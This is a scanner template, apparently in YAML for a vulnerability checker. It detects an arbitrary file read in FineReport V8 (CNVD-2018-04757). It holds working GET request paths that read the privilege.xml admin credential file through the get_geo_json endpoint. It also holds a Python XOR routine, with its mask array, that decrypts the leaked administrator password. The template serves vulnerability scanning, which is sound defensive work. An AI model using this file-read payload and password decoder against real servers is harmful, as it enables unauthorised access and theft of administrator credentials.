id: CNVD-2018-04757
info:
name: 帆软报表 V8 get_geo_json 任意文件读取漏洞
author: zan8in
severity: critical
verified: true
description: |
FineReport报表软件是一款纯Java编写的,集数据展示(报表)和数据录入(表单)功能于一身的企业级web报表工具。
FineReport v8.0版本存在任意文件读取漏洞,攻击者可利用漏洞读取网站任意文件
使用如下解密脚本可解密得到密码
```
cipher = '___0072002a00670066000a' #密文
PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23] #掩码
Password = ""
cipher = cipher[3:] #截断三位后
for i in range(int(len(cipher) / 4)):
c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)
c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8]
Password = Password + chr(c2)
print (Password)
```
body="isSupportForgetPwd"
reference:
- https://mp.weixin.qq.com/s/339OfovdxZ98HHBXFnjOFQ
tags: cnvd,cnvd2018,lfi
rules:
r0:
request:
method: GET
path: /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
expression: response.status == 200 && response.body.bcontains(b'<![CDATA[admin]]') && response.body.bcontains(b'op=fr_platform]]>') && response.body.bcontains(b'PrivilegeManager')
r1:
request:
method: GET
path: /report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
expression: response.status == 200 && response.body.bcontains(b'<![CDATA[admin]]') && response.body.bcontains(b'op=fr_platform]]>') && response.body.bcontains(b'PrivilegeManager')
expression: r0() || r1()